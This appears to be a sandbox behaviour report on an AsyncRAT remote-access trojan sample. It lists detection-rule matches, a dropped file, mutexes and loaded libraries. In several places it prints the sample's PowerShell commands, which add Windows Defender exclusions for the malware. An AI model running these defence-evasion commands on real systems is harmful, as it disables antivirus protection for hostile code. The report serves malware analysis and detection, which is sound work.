                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD343DB9FA8_2_00007FFD343DB9FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD343D26D38_2_00007FFD343D26D3
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD343DBBFB8_2_00007FFD343DBBFB
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD343DB9FA11_2_00007FFD343DB9FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD343D26D311_2_00007FFD343D26D3
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD343D2A6D11_2_00007FFD343D2A6D
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD343DB7FC11_2_00007FFD343DB7FC
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD343DABF211_2_00007FFD343DABF2
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeCode function: 13_2_00007FFD34400EFA13_2_00007FFD34400EFA
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeCode function: 14_2_00007FFD343E0EFA14_2_00007FFD343E0EFA
                          Source: 9RgE5uOJwX.exe, 00000000.00000002.3411654159.0000000013049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdater.exe4 vs 9RgE5uOJwX.exe
                          Source: 9RgE5uOJwX.exe, 00000000.00000000.2129779866.0000000000D13000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUpdater.exe4 vs 9RgE5uOJwX.exe
                          Source: 9RgE5uOJwX.exeBinary or memory string: OriginalFilenameUpdater.exe4 vs 9RgE5uOJwX.exe
                          Source: 9RgE5uOJwX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 9RgE5uOJwX.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 9RgE5uOJwX.exe, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 9RgE5uOJwX.exe, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 9RgE5uOJwX.exe, xEidHkjl3ZbqUKvIPhMdYvEBT.csCryptographic APIs: 'TransformFinalBlock'
                          Source: MicrosoftClient.exe.0.dr, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.csCryptographic APIs: 'TransformFinalBlock'
                          Source: MicrosoftClient.exe.0.dr, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.csCryptographic APIs: 'TransformFinalBlock'
                          Source: MicrosoftClient.exe.0.dr, xEidHkjl3ZbqUKvIPhMdYvEBT.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, xEidHkjl3ZbqUKvIPhMdYvEBT.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 9RgE5uOJwX.exe, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.csBase64 encoded string: 'rOJ9EPEFgU8EeZ1Z1RbZXuQ04f+0unCduWIJ+YdW3io2VwFXy/NzZJUC3dFkSOz/'
                          Source: MicrosoftClient.exe.0.dr, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.csBase64 encoded string: 'rOJ9EPEFgU8EeZ1Z1RbZXuQ04f+0unCduWIJ+YdW3io2VwFXy/NzZJUC3dFkSOz/'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.csBase64 encoded string: 'rOJ9EPEFgU8EeZ1Z1RbZXuQ04f+0unCduWIJ+YdW3io2VwFXy/NzZJUC3dFkSOz/'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: 9RgE5uOJwX.exe, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: 9RgE5uOJwX.exe, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: MicrosoftClient.exe.0.dr, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: MicrosoftClient.exe.0.dr, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: classification engineClassification label: mal100.troj.evad.winEXE@15/19@2/2
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeFile created: C:\Users\user\AppData\Local\MicrosoftClient.exeJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeMutant created: \Sessions\1\BaseNamedObjects\5mzBrJAeAQUAJ7jq
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_03
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3196:120:WilError_03
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfxaurn3.kw0.ps1Jump to behavior
                          Source: 9RgE5uOJwX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: 9RgE5uOJwX.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: 9RgE5uOJwX.exeReversingLabs: Detection: 81%
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeFile read: C:\Users\user\Desktop\9RgE5uOJwX.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\9RgE5uOJwX.exe "C:\Users\user\Desktop\9RgE5uOJwX.exe"
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Local\MicrosoftClient.exe "C:\Users\user\AppData\Local\MicrosoftClient.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\MicrosoftClient.exe "C:\Users\user\AppData\Local\MicrosoftClient.exe"
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: avicap32.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
